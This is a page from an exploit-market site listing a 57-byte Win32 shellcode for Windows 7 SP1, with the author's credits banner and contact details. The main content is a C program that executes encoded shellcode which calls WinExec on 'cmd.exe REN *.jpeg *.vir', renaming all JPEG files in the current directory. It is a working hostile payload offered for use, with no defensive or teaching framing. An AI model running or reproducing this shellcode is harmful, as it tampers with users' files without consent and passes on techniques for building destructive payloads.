[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

win32 / Windows7 Sp1 - rename .jpeg to .vir - 57 bytes

Author
TheUzuki
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-16558
Category
shellcode
Date add
23-07-2011
Platform
win32
# Exploit Title: Win32 / Windows7 Sp1 - rename .jpeg to .vir (57 bytes)
# Date: July, 23 2011
# Author: Theuzuki.'
# Vendor or Software Link: -
# Version: -
# Category:: shellcodes
# Google dork: -
# Tested on: Windows 7 sp 1
# Demo site: -

==================================================
Made by:

___________.__            ____ ___               __   .__ 
\__    ___/|  |__   ____ |    |   \__________ __|  | _|__|
  |    |   |  |  \_/ __ \|    |   /\___   /  |  \  |/ /  |
  |    |   |   Y  \  ___/|    |  /  /    /|  |  /    <|  |
  |____|   |___|  /\___  >______/  /_____ \____/|__|_ \__|
                \/     \/Rats Crew       \/ TheCod3r \/  



Mail: Uzuki@live.de
Website: www.thecoder.co.tv
Nicknames: TheUzuki.' / TheCod3r
Greeting: TheRats Crew
==================================================

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
 
char code[] = "\xeb\x16\x5b\x31\xc0\x50"
"\x53\xbb\x39\xe7\x99\x75\xff\xd3\x31\xc0"
"\x50\xbb\x6f\x2a\x96\x75\xff\xd3\xe8\xe5"
"\xff\xff\xff\x63\x6d\x64\x2e\x65\x78\x65"
"\x20\x52\x45\x4e\x20\x2a\x2e\x6a\x70\x65"
"\x67\x20\x2a\x2e\x76\x69\x72\x00";
 
int main(int argc, char **argv)
{
    ((void (*)())code)();
    printf("Renaming all .jpeg files to .vir files");
    return 0;
} 



#  0day.today [2024-12-25]  #